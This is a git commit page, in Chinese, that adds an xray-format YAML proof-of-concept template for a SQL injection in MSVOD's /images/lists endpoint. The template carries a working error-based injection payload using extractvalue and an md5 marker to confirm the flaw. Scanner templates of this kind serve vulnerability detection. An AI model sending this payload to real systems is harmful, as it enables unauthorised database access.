优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
+12
View File
@@ -0,0 +1,12 @@
name: poc-yaml-msvod-sqli
set:
r1: randomInt(800000000, 1000000000)
rules:
- method: GET
path: "/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a"
expression: |
response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
author: jinqi
links:
- https://github.com/jinqi520